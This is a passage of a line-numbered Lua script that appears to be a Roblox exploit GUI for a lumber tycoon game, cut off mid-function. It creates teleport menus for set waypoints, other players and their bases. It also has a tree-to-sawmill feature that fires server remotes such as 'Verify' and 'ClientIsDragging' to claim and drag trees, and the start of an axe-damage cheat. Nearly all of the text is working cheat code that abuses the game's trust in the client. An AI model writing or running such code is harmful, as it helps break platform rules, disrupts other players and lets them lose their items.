  783. CurrentItem.Size = UDim2.new(0, 80, 0, 80)
  784. CurrentItem.ZIndex = 2
  785. CurrentItem.Image = "rbxassetid://3886256996"
  786. CurrentItem.ScaleType = Enum.ScaleType.Crop
  787.  
  788. Picker.Name = "Picker"
  789. Picker.Parent = MainFrame
  790. Picker.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  791. Picker.BorderColor3 = Color3.new(0, 0, 0)
  792. Picker.BorderSizePixel = 2
  793. Picker.Position = UDim2.new(0, 390, 1, -460)
  794. Picker.Size = UDim2.new(0, 100, 0, 345)
  795. Picker.CanvasPosition = Vector2.new(0,0)
  796. Picker.CanvasSize = UDim2.new(0, 0, 0, 687)
  797. Picker.ScrollBarThickness = 10
  798. Picker.VerticalScrollBarPosition = Enum.VerticalScrollBarPosition.Left
  799. Picker.Visible = false
  800.  
  801. Player.Name = "Player"
  802. Player.Parent = Picker
  803. Player.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  804. Player.BorderColor3 = Color3.new(0, 0, 0)
  805. Player.Position = UDim2.new(0, 15, 0, 5)
  806. Player.Size = UDim2.new(0, 80, 0, 80)
  807. Player.ZIndex = 3
  808. Player.Image = "rbxassetid://3888401903"
  809. Player.ScaleType = Enum.ScaleType.Crop
  810. Player.MouseButton1Click:Connect(function()
  811. CurrentItem.Image = "rbxassetid://3886256996"
  812. makesound("rbxassetid://156785206")
  813. AIntroImage.Visible = true
  814. AIntroImage1.Visible = true
  815. end)
  816.  
  817. PlayerFrame.Name = "PlayerFrame"
  818. PlayerFrame.Parent = MenuFrame
  819. PlayerFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  820. PlayerFrame.BackgroundTransparency = 0
  821. PlayerFrame.BorderColor3 = Color3.new(0, 0, 0)
  822. PlayerFrame.Size = UDim2.new(0, 170, 0, 290)
  823. PlayerFrame.Visible = false
  824.  
  825. PlyrSel.Name = "PlyrSel"
  826. PlyrSel.Parent = PlayerFrame
  827. PlyrSel.BackgroundColor3 = Color3.new(0, 0, 0)
  828. PlyrSel.BackgroundTransparency = 0.15
  829. PlyrSel.BorderColor3 = Color3.new(0, 0, 0)
  830. PlyrSel.Position = UDim2.new(0, 5, 0, 5)
  831. PlyrSel.Size = UDim2.new(0, 160, 0, 20)
  832. PlyrSel.Font = Enum.Font.Fantasy
  833. PlyrSel.FontSize = Enum.FontSize.Size18
  834. PlyrSel.Text = "SELECT A PLAYER"
  835. PlyrSel.TextColor3 = Color3.fromRGB(255, 0, 0)
  836. PlyrSel.TextScaled = true
  837. PlyrSel.TextSize = 17
  838. PlyrSel.TextWrapped = true
  839.  
  840. Player1.Name = "Player1"
  841. Player1.Parent = PlayerFrame
  842. Player1.BackgroundColor3 = Color3.new(0, 0, 0)
  843. Player1.BorderColor3 = Color3.new(0, 0, 0)
  844. Player1.Position = UDim2.new(0, 5, 0, 40)
  845. Player1.Size = UDim2.new(0, 160, 0, 20)
  846. Player1.Font = Enum.Font.Fantasy
  847. Player1.FontSize = Enum.FontSize.Size18
  848. Player1.Text = ""
  849. Player1.TextColor3 = Color3.fromRGB(255, 0, 0)
  850. Player1.TextSize = 16
  851. Player1.TextWrapped = true
  852.  
  853. Player2.Name = "Player2"
  854. Player2.Parent = PlayerFrame
  855. Player2.BackgroundColor3 = Color3.new(0, 0, 0)
  856. Player2.BorderColor3 = Color3.new(0, 0, 0)
  857. Player2.Position = UDim2.new(0, 5, 0, 65)
  858. Player2.Size = UDim2.new(0, 160, 0, 20)
  859. Player2.Font = Enum.Font.Fantasy
  860. Player2.FontSize = Enum.FontSize.Size18
  861. Player2.Text = ""
  862. Player2.TextColor3 = Color3.fromRGB(255, 0, 0)
  863. Player2.TextSize = 16
  864. Player2.TextWrapped = true
  865.  
  866. Player3.Name = "Player3"
  867. Player3.Parent = PlayerFrame
  868. Player3.BackgroundColor3 = Color3.new(0, 0, 0)
  869. Player3.BorderColor3 = Color3.new(0, 0, 0)
  870. Player3.Position = UDim2.new(0, 5, 0, 90)
  871. Player3.Size = UDim2.new(0, 160, 0, 20)
  872. Player3.Font = Enum.Font.Fantasy
  873. Player3.FontSize = Enum.FontSize.Size18
  874. Player3.Text = ""
  875. Player3.TextColor3 = Color3.fromRGB(255, 0, 0)
  876. Player3.TextSize = 16
  877. Player3.TextWrapped = true
  878.  
  879. Player4.Name = "Player4"
  880. Player4.Parent = PlayerFrame
  881. Player4.BackgroundColor3 = Color3.new(0, 0, 0)
  882. Player4.BorderColor3 = Color3.new(0, 0, 0)
  883. Player4.Position = UDim2.new(0, 5, 0, 115)
  884. Player4.Size = UDim2.new(0, 160, 0, 20)
  885. Player4.Font = Enum.Font.Fantasy
  886. Player4.FontSize = Enum.FontSize.Size18
  887. Player4.Text = ""
  888. Player4.TextColor3 = Color3.fromRGB(255, 0, 0)
  889. Player4.TextSize = 16
  890. Player4.TextWrapped = true
  891.  
  892. Player5.Name = "Player5"
  893. Player5.Parent = PlayerFrame
  894. Player5.BackgroundColor3 = Color3.new(0, 0, 0)
  895. Player5.BorderColor3 = Color3.new(0, 0, 0)
  896. Player5.Position = UDim2.new(0, 5, 0, 140)
  897. Player5.Size = UDim2.new(0, 160, 0, 20)
  898. Player5.Font = Enum.Font.Fantasy
  899. Player5.FontSize = Enum.FontSize.Size18
  900. Player5.Text = ""
  901. Player5.TextColor3 = Color3.fromRGB(255, 0, 0)
  902. Player5.TextSize = 16
  903. Player5.TextWrapped = true
  904.  
  905. Player6.Name = "Player6"
  906. Player6.Parent = PlayerFrame
  907. Player6.BackgroundColor3 = Color3.new(0, 0, 0)
  908. Player6.BorderColor3 = Color3.new(0, 0, 0)
  909. Player6.Position = UDim2.new(0, 5, 0, 165)
  910. Player6.Size = UDim2.new(0, 160, 0, 20)
  911. Player6.Font = Enum.Font.Fantasy
  912. Player6.FontSize = Enum.FontSize.Size18
  913. Player6.Text = ""
  914. Player6.TextColor3 = Color3.fromRGB(255, 0, 0)
  915. Player6.TextSize = 16
  916. Player6.TextWrapped = true
  917.  
  918. TpPlayer.Name = "TpPlayer"
  919. TpPlayer.Parent = PlayerFrame
  920. TpPlayer.BackgroundColor3 = Color3.new(0, 0, 0)
  921. TpPlayer.BackgroundTransparency = 0
  922. TpPlayer.BorderColor3 = Color3.new(0, 0, 0)
  923. TpPlayer.Position = UDim2.new(0, 5, 0, 225)
  924. TpPlayer.Size = UDim2.new(0, 75, 0, 35)
  925. TpPlayer.Font = Enum.Font.Fantasy
  926. TpPlayer.FontSize = Enum.FontSize.Size18
  927. TpPlayer.Text = "Tp to Player"
  928. TpPlayer.TextColor3 = Color3.fromRGB(255, 0, 0)
  929. TpPlayer.TextScaled = true
  930. TpPlayer.TextWrapped = true
  931. TpPlayer.TextSize = 14
  932.  
  933. TpBase.Name = "TpBase"
  934. TpBase.Parent = PlayerFrame
  935. TpBase.BackgroundColor3 = Color3.new(0, 0, 0)
  936. TpBase.BackgroundTransparency = 0
  937. TpBase.BorderColor3 = Color3.new(0, 0, 0)
  938. TpBase.Position = UDim2.new(0, 90, 0, 225)
  939. TpBase.Size = UDim2.new(0, 75, 0, 35)
  940. TpBase.Font = Enum.Font.Fantasy
  941. TpBase.FontSize = Enum.FontSize.Size18
  942. TpBase.Text = "Tp to\nBase"
  943. TpBase.TextColor3 = Color3.fromRGB(255, 0, 0)
  944. TpPlayer.TextSize = 22
  945.  
  946.  
  947.  
  948. local WayPoints = {
  949. ["SpawnPoint"] = Vector3.new(155, 3, 74),
  950. ["Link's Logic"] = Vector3.new(4607, 7.5, -798),
  951. ["Fancy Furnishings"] = Vector3.new(491, 3, -1720),
  952. ["Fine Arts Shop"] = Vector3.new(5207, -166, 719),
  953. ["Bob's Shack"] = Vector3.new(260, 8, -2542),
  954. ["Strange Man"] = Vector3.new(1061, 16, 1131),
  955. ["Dock"] = CFrame.new(1114, 3.2, -197),
  956. ["Bridge"] = CFrame.new(113, 15, -977),
  957. ["Shrine Of Sight"] = CFrame.new(-1600, 205, 919),
  958. ["The Den"] = CFrame.new(323, 49, 1930),
  959. ["Volcano Win"] = CFrame.new(-1675, 358, 1476),
  960. ["Cave"] = Vector3.new(3581, -179, 430),
  961. ["Swamp"] = Vector3.new(-1209, 132, -801),
  962. ["SnowGlow Tree"] = CFrame.new(-1105.9, -6, -894),
  963. ["Ski Lodge"] = CFrame.new(1244, 66, 2306)
  964. }
  965.  
  966. Teleport.Name = "Teleport"
  967. Teleport.Parent = Picker
  968. Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
  969. Teleport.BorderColor3 = Color3.new(0, 0, 0)
  970. Teleport.Position = UDim2.new(0, 15, 0,90)
  971. Teleport.Size = UDim2.new(0, 80, 0, 80)
  972. Teleport.ZIndex = 3
  973. Teleport.Image = "rbxassetid://3891269399"
  974. Teleport.ScaleType = Enum.ScaleType.Crop
  975. Teleport.MouseButton1Click:Connect(function()
  976. CurrentItem.Image = "rbxassetid://3886256996"
  977. makesound("rbxassetid://156785206")
  978. AIntroImage.Visible = true
  979. AIntroImage1.Visible = true
  980. end)
  981.  
  982. Waypoints.Name = "Waypoints"
  983. Waypoints.Parent = MenuFrame
  984. Waypoints.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  985. Waypoints.BorderColor3 = Color3.new(0, 0, 0)
  986. Waypoints.Size = UDim2.new(0, 170, 0, 290)
  987. Waypoints.CanvasPosition = Vector2.new(0,0)
  988. Waypoints.CanvasSize = UDim2.new(0, 0, 0, 360)
  989. Waypoints.Visible = false
  990.  
  991. SpawnPoint.Name = "SpawnPoint"
  992. SpawnPoint.Parent = Waypoints
  993. SpawnPoint.BackgroundColor3 = Color3.new(0, 0, 0)
  994. SpawnPoint.Position = UDim2.new(0, 5, 0, 3)
  995. SpawnPoint.Size = UDim2.new(0, 148, 0, 20)
  996. SpawnPoint.Font = Enum.Font.Fantasy
  997. SpawnPoint.FontSize = Enum.FontSize.Size18
  998. SpawnPoint.Text = "Spawn"
  999. SpawnPoint.TextColor3 = Color3.new(255, 0, 0)
  1000. SpawnPoint.TextSize = 16
  1001. SpawnPoint.MouseButton1Down:connect(function()
  1002. makesound("rbxassetid://156785206")
  1003. game.Players.LocalPlayer.Character:MoveTo(WayPoints["SpawnPoint"])
  1004. end)
  1005.  
  1006. PlotTp.Name = "PlotTp"
  1007. PlotTp.Parent = Waypoints
  1008. PlotTp.BackgroundColor3 = Color3.new(0, 0, 0)
  1009. PlotTp.Position = UDim2.new(0, 5, 0, 26)
  1010. PlotTp.Size = UDim2.new(0, 148, 0, 20)
  1011. PlotTp.Font = Enum.Font.Fantasy
  1012. PlotTp.FontSize = Enum.FontSize.Size18
  1013. PlotTp.Text = "Tp to Plot"
  1014. PlotTp.TextColor3 = Color3.fromRGB(255, 0, 0)
  1015. PlotTp.TextSize = 16
  1016. PlotTp.MouseButton1Down:connect(function()
  1017. makesound("rbxassetid://156785206")
  1018. for i,v in pairs(game.Workspace.Properties:GetChildren()) do
  1019. if v.Owner.Value == game.Players.LocalPlayer then
  1020. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.OriginSquare.CFrame + Vector3.new(0,10,0)
  1021. end
  1022. end
  1023. end)
  1024.  
  1025. FancyFurnishings.Name = "FancyFurnishings"
  1026. FancyFurnishings.Parent = Waypoints
  1027. FancyFurnishings.BackgroundColor3 = Color3.new(0, 0, 0)
  1028. FancyFurnishings.Position = UDim2.new(0, 5, 0, 49)
  1029. FancyFurnishings.Size = UDim2.new(0, 148, 0, 20)
  1030. FancyFurnishings.Font = Enum.Font.Fantasy
  1031. FancyFurnishings.FontSize = Enum.FontSize.Size18
  1032. FancyFurnishings.Text = "Fancy Furnishings"
  1033. FancyFurnishings.TextColor3 = Color3.new(255, 0, 0)
  1034. FancyFurnishings.TextSize = 16
  1035. FancyFurnishings.MouseButton1Down:connect(function()
  1036. makesound("rbxassetid://156785206")
  1037. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Fancy Furnishings"])
  1038. end)
  1039.  
  1040. LinksLogic.Name = "LinksLogic"
  1041. LinksLogic.Parent = Waypoints
  1042. LinksLogic.BackgroundColor3 = Color3.new(0, 0, 0)
  1043. LinksLogic.Position = UDim2.new(0, 5, 0, 72)
  1044. LinksLogic.Size = UDim2.new(0, 148, 0, 20)
  1045. LinksLogic.Font = Enum.Font.Fantasy
  1046. LinksLogic.FontSize = Enum.FontSize.Size18
  1047. LinksLogic.Text = "Link's Logic"
  1048. LinksLogic.TextColor3 = Color3.new(255, 0, 0)
  1049. LinksLogic.TextSize = 16
  1050. LinksLogic.MouseButton1Down:connect(function()
  1051. makesound("rbxassetid://156785206")
  1052. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Link's Logic"])
  1053. end)
  1054.  
  1055. FineArtsShop.Name = "FineArtsShop"
  1056. FineArtsShop.Parent = Waypoints
  1057. FineArtsShop.BackgroundColor3 = Color3.new(0, 0, 0)
  1058. FineArtsShop.Position = UDim2.new(0, 5, 0, 95)
  1059. FineArtsShop.Size = UDim2.new(0, 148, 0, 20)
  1060. FineArtsShop.Font = Enum.Font.Fantasy
  1061. FineArtsShop.FontSize = Enum.FontSize.Size18
  1062. FineArtsShop.Text = "Fine Arts Shop"
  1063. FineArtsShop.TextColor3 = Color3.new(255, 0, 0)
  1064. FineArtsShop.TextSize = 16
  1065. FineArtsShop.MouseButton1Down:connect(function()
  1066. makesound("rbxassetid://156785206")
  1067. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Fine Arts Shop"])
  1068. end)
  1069.  
  1070. BobsShack.Name = "BobsShack"
  1071. BobsShack.Parent = Waypoints
  1072. BobsShack.BackgroundColor3 = Color3.new(0, 0, 0)
  1073. BobsShack.Position = UDim2.new(0, 5, 0, 118)
  1074. BobsShack.Size = UDim2.new(0, 148, 0, 20)
  1075. BobsShack.Font = Enum.Font.Fantasy
  1076. BobsShack.FontSize = Enum.FontSize.Size18
  1077. BobsShack.Text = "Bob's Shack"
  1078. BobsShack.TextColor3 = Color3.fromRGB(255, 0, 0)
  1079. BobsShack.TextSize = 16
  1080. BobsShack.MouseButton1Down:connect(function()
  1081. makesound("rbxassetid://156785206")
  1082. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Bob's Shack"])
  1083. end)
  1084.  
  1085. TheDen.Name = "TheDen"
  1086. TheDen.Parent = Waypoints
  1087. TheDen.BackgroundColor3 = Color3.new(0, 0, 0)
  1088. TheDen.Position = UDim2.new(0, 5, 0, 141)
  1089. TheDen.Size = UDim2.new(0, 148, 0, 20)
  1090. TheDen.Font = Enum.Font.Fantasy
  1091. TheDen.FontSize = Enum.FontSize.Size18
  1092. TheDen.Text = "The Den"
  1093. TheDen.TextColor3 = Color3.new(255, 0, 0)
  1094. TheDen.TextSize = 16
  1095. TheDen.MouseButton1Down:connect(function()
  1096. makesound("rbxassetid://156785206")
  1097. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1098. uTorso.CFrame = WayPoints["The Den"]
  1099. end)
  1100.  
  1101. ShrineOfSight.Name = "ShrineOfSight"
  1102. ShrineOfSight.Parent = Waypoints
  1103. ShrineOfSight.BackgroundColor3 = Color3.new(0, 0, 0)
  1104. ShrineOfSight.Position = UDim2.new(0, 5, 0, 164)
  1105. ShrineOfSight.Size = UDim2.new(0, 148, 0, 20)
  1106. ShrineOfSight.Font = Enum.Font.Fantasy
  1107. ShrineOfSight.FontSize = Enum.FontSize.Size18
  1108. ShrineOfSight.Text = "Shrine Of Sight"
  1109. ShrineOfSight.TextColor3 = Color3.new(255, 0, 0)
  1110. ShrineOfSight.TextSize = 16
  1111. ShrineOfSight.MouseButton1Down:connect(function()
  1112. makesound("rbxassetid://156785206")
  1113. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1114. uTorso.CFrame = WayPoints["Shrine Of Sight"]
  1115. end)
  1116.  
  1117. SkiLodge.Name = "Ski Lodge"
  1118. SkiLodge.Parent = Waypoints
  1119. SkiLodge.BackgroundColor3 = Color3.new(0, 0, 0)
  1120. SkiLodge.Position = UDim2.new(0, 5, 0, 187)
  1121. SkiLodge.Size = UDim2.new(0, 148, 0, 20)
  1122. SkiLodge.Font = Enum.Font.Fantasy
  1123. SkiLodge.FontSize = Enum.FontSize.Size18
  1124. SkiLodge.Text = "Ski Lodge"
  1125. SkiLodge.TextColor3 = Color3.new(255, 0, 0)
  1126. SkiLodge.TextSize = 16
  1127. SkiLodge.MouseButton1Down:connect(function()
  1128. makesound("rbxassetid://156785206")
  1129. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1130. uTorso.CFrame = WayPoints["Ski Lodge"]
  1131. end)
  1132.  
  1133. Dock.Name = "Dock"
  1134. Dock.Parent = Waypoints
  1135. Dock.BackgroundColor3 = Color3.new(0, 0, 0)
  1136. Dock.Position = UDim2.new(0, 5, 0, 210)
  1137. Dock.Size = UDim2.new(0, 148, 0, 20)
  1138. Dock.Font = Enum.Font.Fantasy
  1139. Dock.FontSize = Enum.FontSize.Size18
  1140. Dock.Text = "Dock"
  1141. Dock.TextColor3 = Color3.new(255, 0, 0)
  1142. Dock.TextSize = 16
  1143. Dock.MouseButton1Down:connect(function()
  1144. makesound("rbxassetid://156785206")
  1145. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1146. uTorso.CFrame = WayPoints["Dock"]
  1147. end)
  1148.  
  1149. Bridge.Name = "Bridge"
  1150. Bridge.Parent = Waypoints
  1151. Bridge.BackgroundColor3 = Color3.new(0, 0, 0)
  1152. Bridge.Position = UDim2.new(0, 5, 0, 233)
  1153. Bridge.Size = UDim2.new(0, 148, 0, 20)
  1154. Bridge.Font = Enum.Font.Fantasy
  1155. Bridge.FontSize = Enum.FontSize.Size18
  1156. Bridge.Text = "Bridge"
  1157. Bridge.TextColor3 = Color3.new(255, 0, 0)
  1158. Bridge.TextSize = 16
  1159. Bridge.MouseButton1Down:connect(function()
  1160. makesound("rbxassetid://156785206")
  1161. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1162. uTorso.CFrame = WayPoints["Bridge"]
  1163. end)
  1164.  
  1165. Stranger.Name = "Stranger"
  1166. Stranger.Parent = Waypoints
  1167. Stranger.BackgroundColor3 = Color3.new(0, 0, 0)
  1168. Stranger.Position = UDim2.new(0, 5, 0, 256)
  1169. Stranger.Size = UDim2.new(0, 148, 0, 20)
  1170. Stranger.Font = Enum.Font.Fantasy
  1171. Stranger.FontSize = Enum.FontSize.Size18
  1172. Stranger.Text = "Stranger"
  1173. Stranger.TextColor3 = Color3.fromRGB(255, 0, 0)
  1174. Stranger.TextSize = 16
  1175. Stranger.MouseButton1Down:connect(function()
  1176. makesound("rbxassetid://156785206")
  1177. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Strange Man"])
  1178. end)
  1179.  
  1180. VolcanoWin.Name = "VolcanoWin"
  1181. VolcanoWin.Parent = Waypoints
  1182. VolcanoWin.BackgroundColor3 = Color3.new(0, 0, 0)
  1183. VolcanoWin.Position = UDim2.new(0, 5, 0, 279)
  1184. VolcanoWin.Size = UDim2.new(0, 148, 0, 20)
  1185. VolcanoWin.Font = Enum.Font.Fantasy
  1186. VolcanoWin.FontSize = Enum.FontSize.Size18
  1187. VolcanoWin.Text = "Volcano Win"
  1188. VolcanoWin.TextColor3 = Color3.new(255, 0, 0)
  1189. VolcanoWin.TextSize = 16
  1190. VolcanoWin.MouseButton1Down:connect(function()
  1191. makesound("rbxassetid://156785206")
  1192. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1193. uTorso.CFrame = WayPoints["Volcano Win"]
  1194. end)
  1195.  
  1196. ShowLocation.Name = "ShowLocation"
  1197. ShowLocation.Parent = Waypoints
  1198. ShowLocation.BackgroundColor3 = Color3.new(0, 0, 0)
  1199. ShowLocation.Position = UDim2.new(0, 5, 0, 302)
  1200. ShowLocation.Size = UDim2.new(0, 148, 0, 30)
  1201. ShowLocation.Font = Enum.Font.Fantasy
  1202. ShowLocation.FontSize = Enum.FontSize.Size14
  1203. ShowLocation.Text = "Show Current Coords\nSet Custom Location"
  1204. ShowLocation.TextColor3 = Color3.new(255, 0, 0)
  1205. ShowLocation.TextSize = 13
  1206.  
  1207. CustomTPPoint.Name = "CustomTPPoint"
  1208. CustomTPPoint.Parent = Waypoints
  1209. CustomTPPoint.BackgroundColor3 = Color3.new(0, 0, 0)
  1210. CustomTPPoint.Position = UDim2.new(0, 5, 0, 335)
  1211. CustomTPPoint.Size = UDim2.new(0, 148, 0, 20)
  1212. CustomTPPoint.Font = Enum.Font.Fantasy
  1213. CustomTPPoint.FontSize = Enum.FontSize.Size14
  1214. CustomTPPoint.Text = "TP to Custom Location"
  1215. CustomTPPoint.TextColor3 = Color3.new(255, 0, 0)
  1216. CustomTPPoint.TextSize = 13
  1217.  
  1218. -- Scripts:
  1219.  
  1220. --- Show Current Location
  1221.  
  1222. ShowLocation.MouseButton1Down:connect(function()
  1223. makesound("rbxassetid://156785206")
  1224.  
  1225. function round(num, numDecimalPlaces)
  1226. local mult = 10^(numDecimalPlaces or 0)
  1227. return math.floor(num * mult + 0.5) / mult
  1228. end
  1229.  
  1230. LocationX = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.x, 1)
  1231. LocationY = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.y, 1)
  1232. LocationZ = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.z, 1)
  1233. ShowLocation.Text = "Current/Set Location\n"..LocationX..", "..LocationY..", "..LocationZ
  1234. CustomTPPoint.Text = "TP to "..LocationX..", "..LocationY..", "..LocationZ
  1235. CustomLocationSet = true
  1236. end)
  1237.  
  1238. --- TP to custom location ---
  1239.  
  1240. CustomTPPoint.MouseButton1Down:connect(function()
  1241. makesound("rbxassetid://156785206")
  1242. if CustomLocationSet == true then
  1243. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1244. uTorso.CFrame = CFrame.new(LocationX, LocationY, LocationZ)
  1245. end
  1246. end)
  1247.  
  1248.  
  1249. --- Player Tp ---
  1250.  
  1251. local buttons = {
  1252. Player1,
  1253. Player2,
  1254. Player3,
  1255. Player4,
  1256. Player5,
  1257. Player6
  1258. }
  1259. spawn(function()
  1260. while true do
  1261. Player1.Text = ""
  1262. Player2.Text = ""
  1263. Player3.Text = ""
  1264. Player4.Text = ""
  1265. Player5.Text = ""
  1266. Player6.Text = ""
  1267. for i, v in pairs(game.Players:GetChildren()) do
  1268. buttons[i].Text = v.Name
  1269. buttons[i].Visible = true
  1270. end
  1271. wait(0.5)
  1272. end
  1273. end)
  1274.  
  1275. Player1.MouseButton1Down:connect(function()
  1276. makesound("rbxassetid://156785206")
  1277. PlyrSel.Text = Player1.Text
  1278. end)
  1279. Player2.MouseButton1Down:connect(function()
  1280. makesound("rbxassetid://156785206")
  1281. PlyrSel.Text = Player2.Text
  1282. end)
  1283. Player3.MouseButton1Down:connect(function()
  1284. makesound("rbxassetid://156785206")
  1285. PlyrSel.Text = Player3.Text
  1286. end)
  1287. Player4.MouseButton1Down:connect(function()
  1288. makesound("rbxassetid://156785206")
  1289. PlyrSel.Text = Player4.Text
  1290. end)
  1291. Player5.MouseButton1Down:connect(function()
  1292. makesound("rbxassetid://156785206")
  1293. PlyrSel.Text = Player5.Text
  1294. end)
  1295. Player6.MouseButton1Down:connect(function()
  1296. makesound("rbxassetid://156785206")
  1297. PlyrSel.Text = Player6.Text
  1298. end)
  1299.  
  1300. TpPlayer.MouseButton1Down:connect(function()
  1301. makesound("rbxassetid://156785206")
  1302. if PlyrSel.Text == "SELECT A PLAYER" then
  1303. warn("No Player Selected")
  1304. else
  1305. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[PlyrSel.Text].HumanoidRootPart.CFrame
  1306. end
  1307. end)
  1308. TpBase.MouseButton1Down:connect(function()
  1309. makesound("rbxassetid://156785206")
  1310. for i, v in pairs(game.Workspace.Properties:GetChildren()) do
  1311. if v.Owner.Value == game.Players[PlyrSel.Text] then
  1312. local p= CFrame.new(v.OriginSquare.CFrame.x, v.OriginSquare.CFrame.y +3.5, v.OriginSquare.CFrame.z)
  1313. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = p
  1314. end
  1315. end
  1316. end)
  1317.  
  1318.  
  1319. Woodmenu.Name = "Woodmenu"
  1320. Woodmenu.Parent = Picker
  1321. Woodmenu.BackgroundColor3 = Color3.new(1, 1, 1)
  1322. Woodmenu.BorderColor3 = Color3.new(0, 0, 0)
  1323. Woodmenu.Position = UDim2.new(0, 15, 0,175)
  1324. Woodmenu.Size = UDim2.new(0, 80, 0, 80)
  1325. Woodmenu.ZIndex = 3
  1326. Woodmenu.Image = "rbxassetid://3894370075"
  1327. Woodmenu.ScaleType = Enum.ScaleType.Crop
  1328. Woodmenu.MouseButton1Click:Connect(function()
  1329. CurrentItem.Image = "rbxassetid://3886256996"
  1330. makesound("rbxassetid://156785206")
  1331. AIntroImage.Visible = true
  1332. AIntroImage1.Visible = true
  1333. end)
  1334.  
  1335. WoodFrame.Name = "WoodFrame"
  1336. WoodFrame.Parent = MenuFrame
  1337. WoodFrame.BorderSizePixel = 1
  1338. WoodFrame.BackgroundTransparency = 0
  1339. WoodFrame.BorderColor3 = Color3.new(0, 0, 0)
  1340. WoodFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  1341. WoodFrame.Size = UDim2.new(0, 170, 0, 256)
  1342. WoodFrame.Visible = false
  1343.  
  1344. SawmillTp.Name = "SawmillTp"
  1345. SawmillTp.Parent = WoodFrame
  1346. SawmillTp.BackgroundColor3 = Color3.new(0, 0, 0)
  1347. SawmillTp.BorderColor3 = Color3.new(0, 0, 0)
  1348. SawmillTp.Position = UDim2.new(0, 3, 0, 3)
  1349. SawmillTp.Size = UDim2.new(0, 165, 0, 20)
  1350. SawmillTp.Font = Enum.Font.Fantasy
  1351. SawmillTp.FontSize = Enum.FontSize.Size18
  1352. SawmillTp.Text = "Wood to Saw"
  1353. SawmillTp.TextColor3 = Color3.new(265, 0, 0)
  1354. SawmillTp.TextSize = 15
  1355. SawmillTp.MouseButton1Down:connect(function()
  1356. makesound("rbxassetid://156785206")
  1357.  
  1358. SawmillTp.Text = "WOOD TO SAW ON"
  1359. SawmillTp.TextColor3 = Color3.new(0, 1, 0)
  1360. SawmillC = false
  1361. Mouse = game.Players.LocalPlayer:GetMouse()
  1362.  
  1363. Mouse.KeyDown:connect(function(key)
  1364. if key:lower() == "q" then
  1365. Treee = Mouse.Target
  1366. end
  1367. end)
  1368. Mouse.KeyDown:connect(function(key)
  1369. if key:lower() == "p" then
  1370. if Mouse.Target.Parent:FindFirstChild("BlockageAlert") then
  1371. Sawmill = Mouse.Target.Parent
  1372. else
  1373. Sawmill=Mouse.Target.Parent.Parent
  1374. end
  1375. if Sawmill:FindFirstChild("BlockageAlert") and Sawmill:FindFirstChild("Owner") then
  1376. SawmillC = true
  1377. else
  1378. SawmillC = false
  1379. print"Something went wrong while setting the sawmill!"
  1380. end
  1381. if Treee ~= nil then
  1382. Mod(Treee)
  1383. else
  1384. print("Select tree with 'Q'!")
  1385. end
  1386. end
  1387. end)
  1388.  
  1389. function Mod(SelectedPart)
  1390. if SawmillC ~= true then
  1391. print'Set the sawmill with "P"!'
  1392. return
  1393. end
  1394. if SelectedPart.Parent:FindFirstChild("TreeClass") and SelectedPart.Parent:FindFirstChild("Owner") then
  1395. print("Tree: "..SelectedPart.Parent.TreeClass.Value)
  1396. Tree = SelectedPart.Parent
  1397. Tree.PrimaryPart = SelectedPart
  1398. game.ReplicatedStorage.Interaction.Verify:FireServer('Item owned by player',Tree)
  1399. Tree:SetPrimaryPartCFrame(Sawmill.Particles.CFrame)
  1400. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Tree)
  1401. end
  1402. end
  1403. end)
  1404.  
  1405. Goldaxe.Name = "SawmillTp"
  1406. Goldaxe.Parent = WoodFrame
  1407. Goldaxe.BackgroundColor3 = Color3.new(0, 0, 0)
  1408. Goldaxe.BorderColor3 = Color3.new(0, 0, 0)
  1409. Goldaxe.Position = UDim2.new(0, 3, 0, 26)
  1410. Goldaxe.Size = UDim2.new(0, 165, 0, 20)
  1411. Goldaxe.Font = Enum.Font.Fantasy
  1412. Goldaxe.FontSize = Enum.FontSize.Size18
  1413. Goldaxe.Text = "Gold Axe Off"
  1414. Goldaxe.TextColor3 = Color3.new(255, 0, 0)
  1415. Goldaxe.TextSize = 15
  1416. spawn(function()
  1417. --Credits to Johiro, if you decide to skid atleast give credits
  1418. GAxe = false
  1419. function GetAxe() --Gets your current axe thats equiped when called
  1420. if game.Players.LocalPlayer.Character:FindFirstChild("Tool") then
  1421. return game.Players.LocalPlayer.Character.Tool --returns the axe when found
  1422. else
  1423. return false --returns false when not equiped
  1424. end
  1425. end
  1426.  
  1427. function GetDamage(Axe, TreeClass)-- Gets the right Damage of the axe and returns it if called to prevent killing yourself like gold axe
  1428. if Axe.ToolTip == "Basic Hatchet" then return 0.2
  1429. elseif Axe.ToolTip == "Plain Axe" then return 0.55
  1430. elseif Axe.ToolTip == "Steel Axe" then return 0.93
  1431. elseif Axe.ToolTip == "Hardened Axe" then return 1.45
  1432. elseif Axe.ToolTip == "Silver Axe" then return 1.6
  1433. elseif Axe.ToolTip == "Rukiryaxe" then return 1.68
  1434. elseif Axe.ToolTip == "Beta Axe of Bosses" then return 1.45
  1435. elseif Axe.ToolTip == "Alpha Axe of Testing" then return 1.5
  1436. elseif Axe.ToolTip == "Fire Axe" then
